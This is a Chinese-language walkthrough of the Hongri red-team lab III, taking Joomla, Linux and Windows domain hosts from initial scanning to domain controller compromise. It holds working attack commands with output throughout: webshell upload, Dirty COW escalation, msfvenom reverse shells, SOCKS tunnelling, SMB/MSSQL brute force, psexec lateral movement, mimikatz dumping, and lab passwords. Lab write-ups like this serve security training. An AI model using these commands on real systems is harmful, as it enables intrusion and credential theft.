紅日靶場（三）—

環境搭建

添加一張網卡（僅主機模式），192.168.93.0/24 網段

開啟centos，第一次運行，重啟網絡服務

service network restart

192.168.43.57/24（外網ip）
192.168.93.100/24（內網ip）

其他四臺主機均為單網卡機器，將 kali 主機設置為橋接網卡

外網探測

已知外網網段：192.168.43.0/24
發現主機，使用nmap進行簡單的ping掃描

┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sn 192.168.43.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:27 CST
Nmap scan report for 192.168.43.1
Host is up (0.011s latency).
MAC Address: 9E:07:2D:1A:6F:11 (Unknown)
Nmap scan report for 192.168.43.57
Host is up (0.00057s latency).
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap scan report for 192.168.43.58
Host is up (0.00020s latency).
MAC Address: 60:45:2E:C2:AE:57 (Unknown)
Nmap scan report for nuli (192.168.43.191)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds

發現57，58倆臺存活主機
進行簡單端口掃描

nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.57

nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.58

結果：

┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:31 CST
Nmap scan report for 192.168.43.57
Host is up (0.0018s latency).PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   open   ssh           OpenSSH 5.3 (protocol 2.0)
80/tcp   open   http          nginx 1.9.4
88/tcp   closed kerberos-sec
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
389/tcp  closed ldap
443/tcp  closed https
445/tcp  closed microsoft-ds
636/tcp  closed ldapssl
1433/tcp closed ms-sql-s
3306/tcp open   mysql         MySQL 5.7.27-0ubuntu0.16.04.1
3389/tcp closed ms-wbt-server
5985/tcp closed wsman
6379/tcp closed redis
MAC Address: 00:0C:29:32:46:C9 (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds

┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.58Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:31 CST
Nmap scan report for nuli (192.168.43.58)
Host is up (0.000085s latency).PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   closed http
88/tcp   closed kerberos-sec
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  closed ldap
443/tcp  closed https
445/tcp  open   microsoft-ds?
636/tcp  closed ldapssl
1433/tcp closed ms-sql-s
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5985/tcp closed wsman
6379/tcp closed redis
MAC Address: 60:45:2E:C2:AE:57 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.44 seconds

總結：

開放端口
192.168.43.57：
22端口：ssh登錄，爆破密碼
80端口：web網頁
3306端口：mysql，嘗試弱口令192.168.43.58：
135端口：msrpc服務
139端口：netbios-ssn服務，文件和打印機共享
445端口：microsoft-ds，SMB協議

wapplayzer查看：Joomla系統

看到登錄框（果斷嘗試弱口令）

沒成功，可能是字典問題

CMS漏洞掃描

CMS為joomla
使用Joomscan工具掃描：未發現漏洞

Joomla3.9.12

目錄掃描：信息泄露，連接數據庫

dirsearch掃目錄

robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtmlUser-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

192.168.43.57/configuration.php~存在信息泄露

泄露數據庫賬號密碼，也許3306端口可以利用上

public $dbtype = 'mysqli'; 
public $host = 'localhost'; 
public $user = 'testuser'; 
public $password = 'cvcvgjASD!@'; 
public $db = 'joomla';

嘗試連接數據庫

數據庫添加管理員，登錄后臺

官方文檔中有修改密碼的方法：
J1.5：如何恢復或重置您的管理員密碼？- Joomla！文檔

但這里無法修改，于是可以新建超級管理員賬戶

成功登錄

上傳木馬，蟻劍連接

隨便瀏覽，發現模板處可以上傳文件

外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳

繞過disable_functions

設置了disable_functions
蟻鍵插件自帶繞過disable_functions的插件

ssh連接

執行uname -a
nginx反代，實際后端為ubuntu服務器

在www-data:/tmp/mysql/test.txt中有賬號密碼，可以嘗試ssh連接

adduser wwwuser
passwd wwwuser_123Aqx

ubuntu的ip為192.168.93.120
centos的ip為192.168.93.100

提權

這里首先查看具有root權限的suid可執行文件

find / -perm -4000 2>/dev/null

常見root權限文件nmap
vim
find
bash
more
less
nano
cp

無法利用

使用臟牛提權：
exp地址：https://github.com/FireFart/dirtycow
上傳到可讀可寫的文件夾：如/tmp

編譯EXP：

gcc -pthread dirty.c -o dirty –lcrypt

生成root權限的用戶：./dirty 123

查看/etc/passwd

成功創建一個toor超級用戶

提權成功：

內網探測

嘗試reGeorg+Proxchains實現內網穿透（失敗）

網站根目錄上傳tunnel.nosocket.php

但是這里防火墻限制或者是函數限制，建立隧道失敗

上線msf馬（要注意系統版本，這是x86）

生成木馬：

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.191 LPORT=9999 -f elf > a.elf

msf監聽端口：

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.43.191
set LPORT 9999
exploit

執行msf馬：
chmod +x a.elf
./a.elf

獲取完整shell

python -c 'import pty;pty.spawn("/bin/bash")'

內網信息收集

內網網段：192.168.93.0/24

查看內網網段（這里從之前獲取到的信息也能看到）：內網網段：192.168.93.0/24

添加路由（這里我用msf掃不到，后面使用內網穿透）

掛起會話，ctrl+z（掛起后使用命令jobs可以查看掛起的進程，使用命令fg %掛起進程號（例：fg %1)可以恢復msf可以使用bg掛起會話，sessions查詢會話。恢復會話使用sessions -i ID

拿到meterpreter，掛起會話，添加路由

use multi/manage/autoroute
sessions  # 查詢會話id
route add 192.168.93.0 255.255.255.0 1 #1是會話id

內網穿透

使用earthworm搭建socks5反向代理（掃描速度太慢）

攻擊機：
./ew_for_linux64 -s rcsocks -l 1080 -e 1234靶機：
./ew_for_linux64 -s rssocks -d 192.168.43.191 -e 1234

編輯/etc/proxychains.conf文件，將sock5指向127.0.0.1:1080

使用chisel搭建隧道

攻擊機配置：

./chisel server -p 8080 --reverse-p 8080：指定服務端監聽端口
--reverse：允許反向代理

客戶端配置：

./chisel client 192.168.43.191:8080 R:1080:socks

隧道搭建成功，和earthworm沒什么區別

內網信息收集（使用上傳fscan掃描）

上傳fscan工具

./fscan_amd64_1.6 -h 192.168.93.0/24

(icmp) Target '192.168.93.100' is alive（centos）
(icmp) Target '192.168.93.120' is alive（ubuntu）
(icmp) Target '192.168.93.1' is alive
(icmp) Target '192.168.93.20' is alive（win2008）
(icmp) Target '192.168.93.10' is alive（DC域控）
(icmp) Target '192.168.93.30' is alive（win7）

./fscan_amd64_1.6 -h 192.168.93.0/24 -np -nopoc -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379

DC域控

192.168.93.10:389 open 
192.168.93.10:139 open 
192.168.93.10:88 open 
192.168.93.10:53 open 
192.168.93.10:445 open 
192.168.93.10:464 open 
192.168.93.10:593 open 
192.168.93.10:135 open

win2008

192.168.93.20:139 open
192.168.93.20:80 open
192.168.93.20:135 open
192.168.93.20:139 open
192.168.93.20:445 open
192.168.93.20:1433 open

win7

192.168.93.30:135 open
192.168.93.30:139 open
192.168.93.30:445 open

centos

192.168.93.100:22 open
192.168.93.100:80 open
192.168.93.100:3306 open

ubuntu

192.168.93.120:22 open
192.168.93.120:3306 open
192.168.93.120:80 open

分析：

弱口令：
mysql:192.168.93.120:3306:root 123 [+] mysql:192.168.93.100:3306:root 123windows遠程管理：
192.168.93.10（域控）開放 5985 端口win主機均開放445端口，嘗試永恒之藍漏洞

永恒之藍測試

use auxiliary/scanner/smb/smb_ms17_010
set RHOST 192.168.93.10
run

三臺主機均不存在永恒之藍漏洞

msf post(multi/manage/autoroute) > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.10
RHOST => 192.168.93.10
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.10:445     - Host does NOT appear vulnerable.
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.93.10:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.20
RHOST => 192.168.93.20
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.20:445     - Host does NOT appear vulnerable.
[*] 192.168.93.20:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.30
RHOST => 192.168.93.30
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.30:445     - Host does NOT appear vulnerable.
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

MSSQL密碼爆破-命令執行

Win2008開放1433端口

1433端口用于SQL Server對外提供服務

use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 192.168.93.20
run

這里數據庫的賬號密碼就是之前得到的：testuser/cvcvgjASD!@

通過Metasploit的mssql_exec運行cmd命令

use auxiliary/admin/mssql/mssql_exec
show options
set CMD 'ipconfig'
set RHOST 192.168.93.20
set PASSWORD 123456
run

命令無法執行

SMB密碼爆破

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.93.10
set PASS_FILE ~/pass.txt
set SMBUser administrator
exploit

Win7密碼為123qwe!ASD

爆破后Win2008密碼也為：123qwe!ASD

DC并沒有爆破出來

SMB橫向

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator 
set smbpass 123qwe!ASD
run

這里win7的4444端口并沒有被占用，但是SMB連不上，而Win2008可以拿到meterpreter

之后用反向連接拿到Win7的shell

msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.93.130
lhost => 192.168.93.130
msf exploit(windows/smb/psexec) > run

這里進程不穩定，使用進程遷移到穩定的進程

可以看到已經拿到SYSTEM權限
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

進程遷移：

getpid  #獲取當前pid
#選擇一個穩定的進程：`explorer.exe`、`svchost.exe`、`winlogon.exe`
ps    #查看進程
migrate PID

meterpreter > ps |grep explorer
Filtering on 'explorer'
No matching processes were found.
meterpreter > 
meterpreter > migrate 220
[*] Migrating from 344 to 220...
[*] Migration completed successfully.

看到域內有三臺主機

meterpreter > shell
Process 1276 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6003]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.C:\Windows\system32>net view
net view
Server Name            Remark-------------------------------------------------------------------------------
\\WIN-8GA56TNV3MV                                                              
\\WIN2008                                                                      
\\WIN7                                                                         
The command completed successfully.

拿到域控

通過upload命令上傳mimikatz

meterpreter > upload ~/tools/mimikatz/mimikatz.exe C:\\Windows\\temp\\ [*] Uploading : /root/tools/mimikatz/mimikatz.exe -> C:\Windows\temp\mimikatz.exe [*] Completed : /root/tools/mimikatz/mimikatz.exe -> C:\Windows\temp\mimikatz.exe

C:\Windows\Temp>ipconfig /all
ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : win2008Primary Dns Suffix  . . . . . . . : test.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : test.org

sekurlsa::logonpasswords

獲取到域控的密碼：zxcASDqw123!!
但是smb無法連接

msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > set rhost 192.168.93.10
rhost => 192.168.93.10
msf exploit(windows/smb/psexec) > set smbuser administrator 
smbuser => administrator
msf exploit(windows/smb/psexec) > set smbpasswd zxcASDqw123!!
[!] Unknown datastore option: smbpasswd. Did you mean SMBPass?
smbpasswd => zxcASDqw123!!
msf exploit(windows/smb/psexec) > set smbpass zxcASDqw123!!
smbpass => zxcASDqw123!!
msf exploit(windows/smb/psexec) > run
[*] 192.168.93.10:445 - Connecting to the server...
[*] 192.168.93.10:445 - Authenticating to 192.168.93.10:445 as user 'administrator'...
[*] 192.168.93.10:445 - Selecting PowerShell target
[*] 192.168.93.10:445 - Executing the payload...
[+] 192.168.93.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.10:8080
[*] Exploit completed, but no session was created.

反向連接拿到meterpreter

msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.93.130
lhost => 192.168.93.130
msf exploit(windows/smb/psexec) > run

拿到域控，至此，滲透結束！

總結：

基本信息收集，遠程連接數據庫，木馬連接，繞過disable_functions，提權，內網穿透（reGeorg，earthworm），msf上線木馬，msf添加路由，內網信息收集，1433端口MSSQL密碼爆破+命令執行，445端口SMB密碼爆破，使用psexec通過正向連接、反向連接獲取shell，進程遷移，橫向移動

參考資料：
紅日靶機（三）筆記 - LingX5 - 博客園
Vlunstack ATT&CK實戰系列——紅隊實戰（三）Writeup-先知社區
ATT&CK紅隊評估（紅日靶場三） - FreeBuf網絡安全行業門戶